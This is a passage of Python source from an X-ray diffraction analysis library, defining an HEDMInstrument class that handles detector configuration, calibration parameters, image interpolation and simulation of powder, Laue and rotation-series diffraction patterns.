=============================================================================\n\n\nclass HEDMInstrument(object):\n \"\"\"\n Abstraction of XRD instrument.\n\n * Distortion needs to be moved to a class with registry; tuple unworkable\n * where should reference eta be defined? currently set to default config\n \"\"\"\n\n def __init__(self, instrument_config=None,\n image_series=None, eta_vector=None,\n instrument_name=None, tilt_calibration_mapping=None,\n max_workers=max_workers_DFLT):\n self._id = instrument_name_DFLT\n\n if eta_vector is None:\n self._eta_vector = eta_vec_DFLT\n else:\n self._eta_vector = eta_vector\n\n self.max_workers = max_workers\n\n if instrument_config is None:\n if instrument_name is not None:\n self._id = instrument_name\n self._num_panels = 1\n self._beam_energy = beam_energy_DFLT\n self._beam_vector = beam_vec_DFLT\n\n self._detectors = dict(\n panel_id_DFLT=PlanarDetector(\n rows=nrows_DFLT, cols=ncols_DFLT,\n pixel_size=pixel_size_DFLT,\n tvec=t_vec_d_DFLT,\n tilt=tilt_params_DFLT,\n bvec=self._beam_vector,\n evec=self._eta_vector,\n distortion=None,\n max_workers=self.max_workers),\n )\n\n self._tvec = t_vec_s_DFLT\n self._chi = chi_DFLT\n else:\n if isinstance(instrument_config, h5py.File):\n tmp = {}\n unwrap_h5_to_dict(instrument_config, tmp)\n instrument_config.close()\n instrument_config = tmp['instrument']\n elif not isinstance(instrument_config, dict):\n raise RuntimeError(\n \"instrument_config must be either an HDF5 file object\"\n + \"or a dictionary. You gave a %s\"\n % type(instrument_config)\n )\n if instrument_name is None:\n if 'id' in instrument_config:\n self._id = instrument_config['id']\n else:\n self._id = instrument_name\n self._num_panels = len(instrument_config['detectors'])\n self._beam_energy = instrument_config['beam']['energy'] # keV\n self._beam_vector = calc_beam_vec(\n instrument_config['beam']['vector']['azimuth'],\n instrument_config['beam']['vector']['polar_angle'],\n )\n\n # now build detector dict\n detectors_config = instrument_config['detectors']\n det_dict = dict.fromkeys(detectors_config)\n for det_id, det_info in detectors_config.items():\n pixel_info = det_info['pixels']\n affine_info = det_info['transform']\n try:\n saturation_level = det_info['saturation_level']\n except(KeyError):\n saturation_level = 2**16\n shape = (pixel_info['rows'], pixel_info['columns'])\n\n panel_buffer = None\n if buffer_key in det_info:\n det_buffer = det_info[buffer_key]\n if det_buffer is not None:\n if isinstance(det_buffer, np.ndarray):\n if det_buffer.ndim == 2:\n assert det_buffer.shape == shape, \\\n \"buffer shape must match detector\"\n else:\n assert len(det_buffer) == 2\n panel_buffer = det_buffer\n elif isinstance(det_buffer, list):\n panel_buffer = np.asarray(det_buffer)\n elif np.isscalar(det_buffer):\n panel_buffer = det_buffer*np.ones(2)\n else:\n raise RuntimeError(\n \"panel buffer spec invalid for %s\" % det_id\n )\n\n # handle distortion\n distortion = None\n if distortion_key in det_info:\n distortion_cfg = det_info[distortion_key]\n if distortion_cfg is not None:\n try:\n func_name = distortion_cfg['function_name']\n dparams = distortion_cfg['parameters']\n distortion = distortion_pkg.get_mapping(\n func_name, dparams\n )\n except(KeyError):\n raise RuntimeError(\n \"problem with distortion specification\"\n )\n\n det_dict[det_id] = PlanarDetector(\n name=det_id,\n rows=pixel_info['rows'],\n cols=pixel_info['columns'],\n pixel_size=pixel_info['size'],\n panel_buffer=panel_buffer,\n saturation_level=saturation_level,\n tvec=affine_info['translation'],\n tilt=affine_info['tilt'],\n bvec=self._beam_vector,\n evec=self._eta_vector,\n distortion=distortion,\n max_workers=self.max_workers)\n\n self._detectors = det_dict\n\n self._tvec = np.r_[\n instrument_config['oscillation_stage']['translation']\n ]\n self._chi = instrument_config['oscillation_stage']['chi']\n\n #\n # set up calibration parameter list and refinement flags\n #\n # first, grab the mapping function for tilt parameters if specified\n if tilt_calibration_mapping is not None:\n if not isinstance(tilt_calibration_mapping, RotMatEuler):\n raise RuntimeError(\n \"tilt mapping must be a 'RotMatEuler' instance\"\n )\n self._tilt_calibration_mapping = tilt_calibration_mapping\n\n # grab angles from beam vec\n # !!! these are in DEGREES!\n azim, pola = calc_angles_from_beam_vec(self._beam_vector)\n\n # stack instrument level parameters\n # units: keV, degrees, mm\n self._calibration_parameters = [\n self._beam_energy,\n azim,\n pola,\n np.degrees(self._chi),\n *self._tvec,\n ]\n self._calibration_flags = instr_calibration_flags_DFLT\n\n # collect info from panels and append\n det_params = []\n det_flags = []\n for detector in self._detectors.values():\n this_det_params = detector.calibration_parameters\n if self._tilt_calibration_mapping is not None:\n rmat = makeRotMatOfExpMap(detector.tilt)\n self._tilt_calibration_mapping.rmat = rmat\n tilt = np.degrees(self._tilt_calibration_mapping.angles)\n this_det_params[:3] = tilt\n det_params.append(this_det_params)\n det_flags.append(detector.calibration_flags)\n det_params = np.hstack(det_params)\n det_flags = np.hstack(det_flags)\n\n # !!! hstack here assumes that calib params will be float and\n # !!! flags will all be bool\n self._calibration_parameters = np.hstack(\n [self._calibration_parameters,\n det_params]\n ).flatten()\n self._calibration_flags = np.hstack(\n [self._calibration_flags,\n det_flags]\n )\n return\n\n # properties for physical size of rectangular detector\n @property\n def id(self):\n return self._id\n\n @property\n def num_panels(self):\n return self._num_panels\n\n @property\n def detectors(self):\n return self._detectors\n\n @property\n def detector_parameters(self):\n pdict = {}\n for key, panel in self.detectors.items():\n pdict[key] = panel.config_dict(\n self.chi, self.tvec,\n beam_energy=self.beam_energy,\n beam_vector=self.beam_vector\n )\n return pdict\n\n @property\n def tvec(self):\n return self._tvec\n\n @tvec.setter\n def tvec(self, x):\n x = np.array(x).flatten()\n assert len(x) == 3, 'input must have length = 3'\n self._tvec = x\n\n @property\n def chi(self):\n return self._chi\n\n @chi.setter\n def chi(self, x):\n self._chi = float(x)\n\n @property\n def beam_energy(self):\n return self._beam_energy\n\n @beam_energy.setter\n def beam_energy(self, x):\n self._beam_energy = float(x)\n\n @property\n def beam_wavelength(self):\n return ct.keVToAngstrom(self.beam_energy)\n\n @property\n def beam_vector(self):\n return self._beam_vector\n\n @beam_vector.setter\n def beam_vector(self, x):\n x = np.array(x).flatten()\n if len(x) == 3:\n assert sum(x*x) > 1-ct.sqrt_epsf, \\\n 'input must have length = 3 and have unit magnitude'\n self._beam_vector = x\n elif len(x) == 2:\n self._beam_vector = calc_beam_vec(*x)\n else:\n raise RuntimeError(\"input must be a unit vector or angle pair\")\n # ...maybe change dictionary item behavior for 3.x compatibility?\n for detector_id in self.detectors:\n panel = self.detectors[detector_id]\n panel.bvec = self._beam_vector\n\n @property\n def eta_vector(self):\n return self._eta_vector\n\n @eta_vector.setter\n def eta_vector(self, x):\n x = np.array(x).flatten()\n assert len(x) == 3 and sum(x*x) > 1-ct.sqrt_epsf, \\\n 'input must have length = 3 and have unit magnitude'\n self._eta_vector = x\n # ...maybe change dictionary item behavior for 3.x compatibility?\n for detector_id in self.detectors:\n panel = self.detectors[detector_id]\n panel.evec = self._eta_vector\n\n @property\n def tilt_calibration_mapping(self):\n return self._tilt_calibration_mapping\n\n @tilt_calibration_mapping.setter\n def tilt_calibration_mapping(self, x):\n if not isinstance(x, RotMatEuler) and x is not None:\n raise RuntimeError(\n \"tilt mapping must be None or a 'RotMatEuler' instance\"\n )\n self._tilt_calibration_mapping = x\n\n @property\n def calibration_parameters(self):\n \"\"\"\n Yields concatenated list of instrument parameters.\n\n Returns\n -------\n array_like\n concatenated list of instrument parameters.\n\n \"\"\"\n # grab angles from beam vec\n # !!! these are in DEGREES!\n azim, pola = calc_angles_from_beam_vec(self.beam_vector)\n\n # stack instrument level parameters\n # units: keV, degrees, mm\n calibration_parameters = [\n self.beam_energy,\n azim,\n pola,\n np.degrees(self.chi),\n *self.tvec,\n ]\n\n # collect info from panels and append\n det_params = []\n det_flags = []\n for detector in self.detectors.values():\n this_det_params = detector.calibration_parameters\n if self.tilt_calibration_mapping is not None:\n rmat = makeRotMatOfExpMap(detector.tilt)\n self.tilt_calibration_mapping.rmat = rmat\n tilt = np.degrees(self.tilt_calibration_mapping.angles)\n this_det_params[:3] = tilt\n det_params.append(this_det_params)\n det_flags.append(detector.calibration_flags)\n det_params = np.hstack(det_params)\n det_flags = np.hstack(det_flags)\n\n # !!! hstack here assumes that calib params will be float and\n # !!! flags will all be bool\n calibration_parameters = np.hstack(\n [calibration_parameters,\n det_params]\n ).flatten()\n self._calibration_parameters = calibration_parameters\n return self._calibration_parameters\n\n @property\n def calibration_flags(self):\n return self._calibration_flags\n\n @calibration_flags.setter\n def calibration_flags(self, x):\n x = np.array(x, dtype=bool).flatten()\n if len(x) != len(self._calibration_flags):\n raise RuntimeError(\n \"length of parameter list must be %d; you gave %d\"\n % (len(self._calibration_flags), len(x))\n )\n ii = 7\n for panel in self.detectors.values():\n npp = 6\n if panel.distortion is not None:\n npp += len(panel.distortion.params)\n panel.calibration_flags = x[ii:ii + npp]\n self._calibration_flags = x\n\n # =========================================================================\n # METHODS\n # =========================================================================\n\n def write_config(self, filename=None, style='yaml', calibration_dict={}):\n \"\"\" WRITE OUT YAML FILE \"\"\"\n # initialize output dictionary\n assert style.lower() in ['yaml', 'hdf5'], \\\n \"style must be either 'yaml', or 'hdf5'; you gave '%s'\" % style\n\n par_dict = {}\n\n par_dict['id'] = self.id\n\n azim, pola = calc_angles_from_beam_vec(self.beam_vector)\n beam = dict(\n energy=self.beam_energy,\n vector=dict(\n azimuth=azim,\n polar_angle=pola,\n )\n )\n par_dict['beam'] = beam\n\n if calibration_dict:\n par_dict['calibration_crystal'] = calibration_dict\n\n ostage = dict(\n chi=self.chi,\n translation=self.tvec.tolist()\n )\n par_dict['oscillation_stage'] = ostage\n\n det_dict = dict.fromkeys(self.detectors)\n for det_name, detector in self.detectors.items():\n # grab panel config\n # !!! don't need beam or tvec\n # !!! have vetted style\n pdict = detector.config_dict(chi=self.chi, tvec=self.tvec,\n beam_energy=self.beam_energy,\n beam_vector=self.beam_vector,\n style=style)\n det_dict[det_name] = pdict['detector']\n par_dict['detectors'] = det_dict\n\n # handle output file if requested\n if filename is not None:\n if style.lower() == 'yaml':\n with open(filename, 'w') as f:\n yaml.dump(par_dict, stream=f)\n else:\n # hdf5\n with h5py.File(filename, 'w') as f:\n instr_grp = f.create_group('instrument')\n unwrap_dict_to_h5(instr_grp, par_dict, asattr=False)\n\n return par_dict\n\n def update_from_parameter_list(self, p):\n \"\"\"\n Update the instrument class from a parameter list.\n\n Utility function to update instrument parameters from a 1-d master\n parameter list (e.g. as used in calibration)\n\n !!! Note that angles are reported in DEGREES!\n \"\"\"\n self.beam_energy = p[0]\n self.beam_vector = calc_beam_vec(p[1], p[2])\n self.chi = np.radians(p[3])\n self.tvec = np.r_[p[4:7]]\n\n ii = 7\n for det_name, detector in self.detectors.items():\n this_det_params = detector.calibration_parameters\n npd = len(this_det_params) # total number of params\n dpnp = npd - 6 # number of distortion params\n\n # first do tilt\n tilt = np.r_[p[ii:ii + 3]]\n if self.tilt_calibration_mapping is not None:\n self.tilt_calibration_mapping.angles = np.radians(tilt)\n rmat = self.tilt_calibration_mapping.rmat\n phi, n = angleAxisOfRotMat(rmat)\n tilt = phi*n.flatten()\n detector.tilt = tilt\n\n # then do translation\n ii += 3\n detector.tvec = np.r_[p[ii:ii + 3]]\n\n # then do distortion (if necessart)\n # FIXME will need to update this with distortion fix\n ii += 3\n if dpnp > 0:\n if detector.distortion is None:\n raise RuntimeError(\n \"distortion discrepancy for '%s'!\"\n % det_name\n )\n else:\n try:\n detector.distortion.params = p[ii:ii + dpnp]\n except(AssertionError):\n raise RuntimeError(\n \"distortion for '%s' \" % det_name\n + \"expects %d params but got %d\"\n % (len(detector.distortion.params), dpnp)\n )\n ii += dpnp\n return\n\n def extract_polar_maps(self, plane_data, imgser_dict,\n active_hkls=None, threshold=None,\n tth_tol=None, eta_tol=0.25):\n \"\"\"\n Extract eta-omega maps from an imageseries.\n\n Quick and dirty way to histogram angular patch data for make\n pole figures suitable for fiber generation\n\n TODO: streamline projection code\n TODO: normalization\n !!!: images must be non-negative!\n \"\"\"\n if tth_tol is not None:\n plane_data.tThWidth = np.radians(tth_tol)\n else:\n tth_tol = np.degrees(plane_data.tThWidth)\n\n tth_ranges = plane_data.getTThRanges()\n if active_hkls is not None:\n assert hasattr(active_hkls, '__len__'), \\\n \"active_hkls must be an iterable with __len__\"\n tth_ranges = tth_ranges[active_hkls]\n\n # # need this for making eta ranges\n # eta_tol_vec = 0.5*np.radians([-eta_tol, eta_tol])\n\n # make rings clipped to panel\n # !!! eta_idx has the same length as plane_data.exclusions\n # each entry are the integer indices into the bins\n # !!! eta_edges is the list of eta bin EDGES\n # We can use the same eta_edge for all detectors, so calculate it once\n pow_angs, pow_xys, eta_idx, eta_edges = list(\n self.detectors.values()\n )[0].make_powder_rings(plane_data,\n merge_hkls=False, delta_eta=eta_tol,\n full_output=True)\n delta_eta = eta_edges[1] - eta_edges[0]\n ncols_eta = len(eta_edges) - 1\n\n ring_maps_panel = dict.fromkeys(self.detectors)\n for i_d, det_key in enumerate(self.detectors):\n print(\"working on detector '%s'...\" % det_key)\n\n # grab panel\n panel = self.detectors[det_key]\n # native_area = panel.pixel_area # pixel ref area\n\n # pixel angular coords for the detector panel\n ptth, peta = panel.pixel_angles()\n\n # grab omegas from imageseries and squawk if missing\n try:\n omegas = imgser_dict[det_key].metadata['omega']\n except(KeyError):\n msg = \"imageseries for '%s' has no omega info\" % det_key\n raise RuntimeError(msg)\n\n # initialize maps and assing by row (omega/frame)\n nrows_ome = len(omegas)\n\n # init map with NaNs\n shape = (len(tth_ranges), nrows_ome, ncols_eta)\n ring_maps = np.full(shape, np.nan)\n\n # Generate ring parameters once, and re-use them for each image\n ring_params = []\n for tthr in tth_ranges:\n kwargs = {\n 'tthr': tthr,\n 'ptth': ptth,\n 'peta': peta,\n 'eta_edges': eta_edges,\n 'delta_eta': delta_eta,\n }\n ring_params.append(_generate_ring_params(**kwargs))\n\n # Divide up the images among processes\n ims = imgser_dict[det_key]\n tasks = distribute_tasks(len(ims), self.max_workers)\n func = partial(_run_histograms, ims=ims, tth_ranges=tth_ranges,\n ring_maps=ring_maps, ring_params=ring_params,\n threshold=threshold)\n\n with ThreadPoolExecutor(max_workers=self.max_workers) as executor:\n executor.map(func, tasks)\n\n ring_maps_panel[det_key] = ring_maps\n\n return ring_maps_panel, eta_edges\n\n def extract_line_positions(self, plane_data, imgser_dict,\n tth_tol=None, eta_tol=1., npdiv=2,\n eta_centers=None,\n collapse_eta=True, collapse_tth=False,\n do_interpolation=True):\n \"\"\"\n Perform annular interpolation on diffraction images.\n\n Provides data for extracting the line positions from powder diffraction\n images, pole figure patches from imageseries, or Bragg peaks from\n Laue diffraction images.\n\n Parameters\n ----------\n plane_data : hexrd.crystallography.PlaneData object or array_like\n Object determining the 2theta positions for the integration\n sectors. If PlaneData, this will be all non-excluded reflections,\n subject to merging within PlaneData.tThWidth. If array_like,\n interpreted as a list of 2theta angles IN RADIAN (this may change).\n imgser_dict : dict\n Dictionary of powder diffraction images, one for each detector.\n tth_tol : scalar, optional\n The radial (i.e. 2theta) width of the integration sectors\n IN DEGREES. This arg is required if plane_data is array_like.\n The default is None.\n eta_tol : scalar, optional\n The azimuthal (i.e. eta) width of the integration sectors\n IN DEGREES. The default is 1.\n npdiv : int, optional\n The number of oversampling pixel subdivision (see notes).\n The default is 2.\n eta_centers : array_like, optional\n The desired azimuthal sector centers. The default is None. If\n None, then bins are distrubted sequentially from (-180, 180).\n collapse_eta : bool, optional\n Flag for summing sectors in eta. The default is True.\n collapse_tth : bool, optional\n Flag for summing sectors in 2theta. The default is False.\n do_interpolation : bool, optional\n If True, perform bilinear interpolation. The default is True.\n\n Raises\n ------\n RuntimeError\n DESCRIPTION.\n\n Returns\n -------\n panel_data : dict\n Dictionary over the detctors with the following structure:\n [list over (merged) 2theta ranges]\n [list over valid eta sectors]\n [angle data ,\n bin intensities ]\n\n Notes\n -----\n TODO: May change the array_like input units to degrees.\n TODO: rename function.\n\n \"\"\"\n if not hasattr(plane_data, '__len__'):\n plane_data = plane_data.makeNew() # make local copy to munge\n if tth_tol is not None:\n plane_data.tThWidth = np.radians(tth_tol)\n tth_ranges = np.degrees(plane_data.getMergedRanges()[1])\n tth_tols = np.hstack([i[1] - i[0] for i in tth_ranges])\n else:\n tth_tols = np.ones(len(plane_data))*tth_tol\n\n # =====================================================================\n # LOOP OVER DETECTORS\n # =====================================================================\n panel_data = dict.fromkeys(self.detectors)\n for i_det, detector_id in enumerate(self.detectors):\n print(\"working on detector '%s'...\" % detector_id)\n # pbar.update(i_det + 1)\n # grab panel\n panel = self.detectors[detector_id]\n instr_cfg = panel.config_dict(\n chi=self.chi, tvec=self.tvec,\n beam_energy=self.beam_energy,\n beam_vector=self.beam_vector\n )\n native_area = panel.pixel_area # pixel ref area\n images = imgser_dict[detector_id]\n if images.ndim == 2:\n n_images = 1\n images = np.tile(images, (1, 1, 1))\n elif images.ndim == 3:\n n_images = len(images)\n else:\n raise RuntimeError(\"images must be 2- or 3-d\")\n\n # make rings\n pow_angs, pow_xys = panel.make_powder_rings(\n plane_data, merge_hkls=True,\n delta_tth=tth_tol, delta_eta=eta_tol,\n eta_list=eta_centers)\n\n # =================================================================\n # LOOP OVER RING SETS\n # =================================================================\n ring_data = []\n for i_ring, these_data in enumerate(zip(pow_angs, pow_xys)):\n print(\"interpolating 2theta bin %d...\" % i_ring)\n\n # points are already checked to fall on detector\n angs = these_data[0]\n xys = these_data[1]\n\n # make the tth,eta patches for interpolation\n patches = xrdutil.make_reflection_patches(\n instr_cfg, angs, panel.angularPixelSize(xys),\n tth_tol=tth_tols[i_ring], eta_tol=eta_tol,\n npdiv=npdiv, quiet=True)\n\n # loop over patches\n # FIXME: fix initialization\n if collapse_tth:\n patch_data = np.zeros((len(angs), n_images))\n else:\n patch_data = []\n for i_p, patch in enumerate(patches):\n # strip relevant objects out of current patch\n vtx_angs, vtx_xys, conn, areas, xys_eval, ijs = patch\n\n # need to reshape eval pts for interpolation\n xy_eval = np.vstack([\n xys_eval[0].flatten(),\n xys_eval[1].flatten()]).T\n\n _, on_panel = panel.clip_to_panel(xy_eval)\n\n if np.any(~on_panel):\n continue\n\n if collapse_tth:\n ang_data = (vtx_angs[0][0, [0, -1]],\n vtx_angs[1][[0, -1], 0])\n elif collapse_eta:\n # !!! yield the tth bin centers\n tth_centers = np.average(\n np.vstack([vtx_angs[0][0, :-1], vtx_angs[0][0, 1:]]),\n axis=0\n )\n ang_data = (tth_centers,\n angs[i_p][-1])\n else:\n ang_data = vtx_angs\n\n prows, pcols = areas.shape\n area_fac = areas/float(native_area)\n\n # interpolate\n if not collapse_tth:\n ims_data = []\n for j_p in np.arange(len(images)):\n # catch interpolation type\n image = images[j_p]\n if do_interpolation:\n tmp = panel.interpolate_bilinear(\n xy_eval,\n image,\n ).reshape(prows, pcols)*area_fac\n else:\n tmp = image[ijs[0], ijs[1]]*area_fac\n\n # catch collapsing options\n if collapse_tth:\n patch_data[i_p, j_p] = np.average(tmp)\n # ims_data.append(np.sum(tmp))\n else:\n if collapse_eta:\n ims_data.append(np.average(tmp, axis=0))\n else:\n ims_data.append(tmp)\n pass # close image loop\n if not collapse_tth:\n patch_data.append((ang_data, ims_data))\n pass # close patch loop\n ring_data.append(patch_data)\n pass # close ring loop\n panel_data[detector_id] = ring_data\n pass # close panel loop\n # pbar.finish()\n return panel_data\n\n def simulate_powder_pattern(self,\n mat_list,\n params=None,\n bkgmethod=None,\n origin=None,\n noise=None):\n \"\"\"\n Generate powder diffraction iamges from specified materials.\n\n Parameters\n ----------\n mat_list : array_like (n, )\n List of Material classes.\n params : dict, optional\n Dictionary of LeBail parameters (see Notes). The default is None.\n bkgmethod : dict, optional\n Background function specification. The default is None.\n origin : array_like (3,), optional\n Vector describing the origin of the diffrction volume.\n The default is None, wiich is equivalent to [0, 0, 0].\n noise : str, optional\n Flag describing type of noise to be applied. The default is None.\n\n Returns\n -------\n img_dict : dict\n Dictionary of diffraciton images over the detectors.\n\n Notes\n -----\n TODO: add more controls for noise function.\n TODO: modify hooks to LeBail parameters.\n TODO: add optional volume fraction weights for phases in mat_list\n \"\"\"\n \"\"\"\n >> @AUTHOR: Saransh Singh, Lanwrence Livermore National Lab,\n saransh1@llnl.gov\n >> @DATE: 01/22/2021 SS 1.0 original\n >> @DETAILS: adding hook to WPPF class. this changes the input list\n significantly\n \"\"\"\n if origin is None:\n origin = self.tvec\n origin = np.asarray(origin).squeeze()\n assert len(origin) == 3, \\\n \"origin must be a 3-element sequence\"\n\n '''\n if params is none, fill in some sane default values\n only the first value is used. the rest of the values are\n the upper, lower bounds and vary flag for refinement which\n are not used but required for interfacing with WPPF\n\n zero_error : zero shift error\n U, V, W : Cagliotti parameters\n P, X, Y : Lorentzian parameters\n eta1, eta2, eta3 : Mixing parameters\n '''\n if(params is None):\n # params = {'zero_error': [0.0, -1., 1., True],\n # 'U': [2e-1, -1., 1., True],\n # 'V': [2e-2, -1., 1., True],\n # 'W': [2e-2, -1., 1., True],\n # 'X': [2e-1, -1., 1., True],\n # 'Y': [2e-1, -1., 1., True]\n # }\n params = wppfsupport._generate_default_parameters_LeBail(\n mat_list,\n 1)\n '''\n use the material list to obtain the dictionary of initial intensities\n we need to make sure that the intensities are properly scaled by the\n lorentz polarization factor. since the calculation is done in the\n LeBail class, all that means is the initial intensity needs that factor\n in there\n '''\n img_dict = dict.fromkeys(self.detectors)\n\n # find min and max tth over all panels\n tth_mi = np.inf\n tth_ma = 0.\n ptth_dict = dict.fromkeys(self.detectors)\n for det_key, panel in self.detectors.items():\n ptth, peta = panel.pixel_angles(origin=origin)\n tth_mi = min(tth_mi, ptth.min())\n tth_ma = max(tth_ma, ptth.max())\n ptth_dict[det_key] = ptth\n\n '''\n now make a list of two theta and dummy ones for the experimental\n spectrum this is never really used so any values should be okay. We\n could also pas the integrated detector image if we would like to\n simulate some realistic background. But thats for another day.\n '''\n # convert angles to degrees because thats what the WPPF expects\n tth_mi = np.degrees(tth_mi)\n tth_ma = np.degrees(tth_ma)\n\n # get tth angular resolution for instrument\n ang_res = max_resolution(self)\n\n # !!! calc nsteps by oversampling\n nsteps = int(np.ceil(2*(tth_ma - tth_mi)/np.degrees(ang_res[0])))\n\n # evaulation vector for LeBail\n tth = np.linspace(tth_mi, tth_ma, nsteps)\n\n expt = np.vstack([tth, np.ones_like(tth)]).T\n\n wavelength = [\n valWUnit('lp', 'length', self.beam_wavelength, 'angstrom'),\n 1.\n ]\n\n '''\n now go through the material list and get the intensity dictionary\n '''\n intensity = {}\n for mat in mat_list:\n\n multiplicity = mat.planeData.getMultiplicity()\n\n tth = mat.planeData.getTTh()\n\n LP = (1 + np.cos(tth)**2) / \\\n np.cos(0.5*tth)/np.sin(0.5*tth)**2\n\n intensity[mat.name] = {}\n intensity[mat.name]['synchrotron'] = \\\n mat.planeData.get_structFact() * LP * multiplicity\n\n kwargs = {\n 'expt_spectrum': expt,\n 'params': params,\n 'phases': mat_list,\n 'wavelength': {\n 'synchrotron': wavelength\n },\n 'bkgmethod': bkgmethod,\n 'intensity_init': intensity,\n 'peakshape': 'pvtch'\n }\n\n self.WPPFclass = LeBail(**kwargs)\n\n self.simulated_spectrum = self.WPPFclass.spectrum_sim\n self.background = self.WPPFclass.background\n\n '''\n now that we have the simulated intensities, its time to get the\n two theta for the detector pixels and interpolate what the intensity\n for each pixel should be\n '''\n\n img_dict = dict.fromkeys(self.detectors)\n for det_key, panel in self.detectors.items():\n ptth = ptth_dict[det_key]\n\n img = np.interp(np.degrees(ptth),\n self.simulated_spectrum.x,\n self.simulated_spectrum.y + self.background.y)\n\n # normalize everything to 0-1\n mi = img.min()\n ma = img.max()\n\n if(ma > mi):\n img = (img - mi) / (ma - mi)\n\n if(noise is None):\n img_dict[det_key] = img\n\n else:\n if(noise.lower() == 'poisson'):\n im_noise = random_noise(img,\n mode='poisson',\n clip=True)\n mi = im_noise.min()\n ma = im_noise.max()\n if(ma > mi):\n im_noise = (im_noise - mi)/(ma - mi)\n\n img_dict[det_key] = im_noise\n\n elif(noise.lower() == 'gaussian'):\n img_dict[det_key] = random_noise(img,\n mode='gaussian',\n clip=True)\n\n elif(noise.lower() == 'salt'):\n img_dict[det_key] = random_noise(img, mode='salt')\n\n elif(noise.lower() == 'pepper'):\n img_dict[det_key] = random_noise(img, mode='pepper')\n\n elif(noise.lower() == 's&p'):\n img_dict[det_key] = random_noise(img, mode='s&p')\n\n elif(noise.lower() == 'speckle'):\n img_dict[det_key] = random_noise(img,\n mode='speckle',\n clip=True)\n\n return img_dict\n\n def simulate_laue_pattern(self, crystal_data,\n minEnergy=5., maxEnergy=35.,\n rmat_s=None, grain_params=None):\n \"\"\"\n Simulate Laue diffraction over the instrument.\n\n Parameters\n ----------\n crystal_data : TYPE\n DESCRIPTION.\n minEnergy : TYPE, optional\n DESCRIPTION. The default is 5..\n maxEnergy : TYPE, optional\n DESCRIPTION. The default is 35..\n rmat_s : TYPE, optional\n DESCRIPTION. The default is None.\n grain_params : TYPE, optional\n DESCRIPTION. The default is None.\n\n Returns\n -------\n results : TYPE\n DESCRIPTION.\n\n TODO: revisit output; dict, or concatenated list?\n \"\"\"\n results = dict.fromkeys(self.detectors)\n for det_key, panel in self.detectors.items():\n results[det_key] = panel.simulate_laue_pattern(\n crystal_data,\n minEnergy=minEnergy, maxEnergy=maxEnergy,\n rmat_s=rmat_s, tvec_s=self.tvec,\n grain_params=grain_params,\n beam_vec=self.beam_vector)\n return results\n\n def simulate_rotation_series(self, plane_data, grain_param_list,\n eta_ranges=[(-np.pi, np.pi), ],\n ome_ranges=[(-np.pi, np.pi), ],\n ome_period=(-np.pi, np.pi),\n wavelength=None):\n \"\"\"\n Simulate a monochromatic rotation series over the instrument.\n\n Parameters\n ----------\n plane_data : TYPE\n DESCRIPTION.\n grain_param_list : TYPE\n DESCRIPTION.\n eta_ranges : TYPE, optional\n DESCRIPTION. The default is [(-np.pi, np.pi), ].\n ome_ranges : TYPE, optional\n DESCRIPTION. The default is [(-np.pi, np.pi), ].\n ome_period : TYPE, optional\n DESCRIPTION. The default is (-np.pi, np.pi).\n wavelength : TYPE, optional\n DESCRIPTION. The default is None.\n\n Returns\n -------\n results : TYPE\n DESCRIPTION.\n\n TODO: revisit output; dict, or concatenated list?\n \"\"\"\n results = dict.fromkeys(self.detectors)\n for det_key, panel in self.detectors.items():\n results[det_key] = panel.simulate_rotation_series(\n plane_data, grain_param_list,\n eta_ranges=eta_ranges,\n ome_ranges=ome_ranges,\n ome_period=ome_period,\n chi=self.chi, tVec_s=self.tvec,\n wavelength=wavelength)\n return results\n\n def pull_spots(self, plane_data, grain_params,\n imgser_dict,\n tth_tol=0.25, eta_tol=1., ome_tol=1.,\n npdiv=2, threshold=10,\n eta_ranges=[(-np.pi, np.pi), ],\n ome_period=(-np.pi, np.pi),\n dirname='results', filename=None, output_format='text',\n return_spot_list=False,\n quiet=True, check_only=False,\n interp='nearest'):\n \"\"\"\n Exctract reflection info from a rotation series.\n\n Input must be encoded as an OmegaImageseries object.\n\n Parameters\n ----------\n plane_data : TYPE\n DESCRIPTION.\n grain_params : TYPE\n DESCRIPTION.\n imgser_dict : TYPE\n DESCRIPTION.\n tth_tol : TYPE, optional\n DESCRIPTION. The default is 0.25.\n eta_tol : TYPE, optional\n DESCRIPTION. The default is 1..\n ome_tol : TYPE, optional\n DESCRIPTION. The default is 1..\n npdiv : TYPE, optional\n DESCRIPTION. The default is 2.\n threshold : TYPE, optional\n DESCRIPTION. The default is 10.\n eta_ranges : TYPE, optional\n DESCRIPTION. The default is [(-np.pi, np.pi), ].\n ome_period : TYPE, optional\n DESCRIPTION. The default is (-np.pi, np.pi).\n dirname : TYPE, optional\n DESCRIPTION. The default is 'results'.\n filename : TYPE, optional\n DESCRIPTION. The default is None.\n output_format : TYPE, optional\n DESCRIPTION. The default is 'text'.\n return_spot_list : TYPE, optional\n DESCRIPTION. The default is False.\n quiet : TYPE, optional\n DESCRIPTION. The default is True.\n check_only : TYPE, optional\n DESCRIPTION. The default is False.\n interp : TYPE, optional\n DESCRIPTION. The default is 'nearest'.\n\n Returns\n -------\n compl : TYPE\n DESCRIPTION.\n output : TYPE\n DESCRIPTION.\n\n \"\"\"\n # grain parameters\n rMat_c = makeRotMatOfExpMap(grain_params[:3])\n tVec_c = grain_params[3:6]\n\n # grab omega ranges from first imageseries\n #\n # WARNING: all imageseries AND all wedges within are assumed to have\n # the same omega values; put in a check that they are all the same???\n oims0 = next(iter(imgser_dict.values()))\n ome_ranges = [np.radians([i['ostart'], i['ostop']])\n for i in oims0.omegawedges.wedges]\n\n # delta omega in DEGREES grabbed from first imageseries in the dict\n delta_ome = oims0.omega[0, 1] - oims0.omega[0, 0]\n\n # make omega grid for frame expansion around reference frame\n # in DEGREES\n ndiv_ome, ome_del = make_tolerance_grid(\n delta_ome, ome_tol, 1, adjust_window=True,\n )\n\n # generate structuring element for connected component labeling\n if ndiv_ome == 1:\n label_struct = ndimage.generate_binary_structure(2, 2)\n else:\n label_struct = ndimage.generate_binary_structure(3, 3)\n\n # simulate rotation series\n sim_results = self.simulate_rotation_series(\n plane_data, [grain_params, ],\n eta_ranges=eta_ranges,\n ome_ranges=ome_ranges,\n ome_period=ome_period)\n\n # patch vertex generator (global for instrument)\n tol_vec = 0.5*np.radians(\n [-tth_tol, -eta_tol,\n -tth_tol, eta_tol,\n tth_tol, eta_tol,\n tth_tol, -eta_tol])\n\n # prepare output if requested\n if filename is not None and output_format.lower() == 'hdf5':\n this_filename = os.path.join(dirname, filename)\n writer = GrainDataWriter_h5(\n os.path.join(dirname, filename),\n self.write_config(), grain_params)\n\n # =====================================================================\n # LOOP OVER PANELS\n # =====================================================================\n iRefl = 0\n compl = []\n output = dict.fromkeys(self.detectors)\n for detector_id in self.detectors:\n # initialize text-based output writer\n if filename is not None and output_format.lower() == 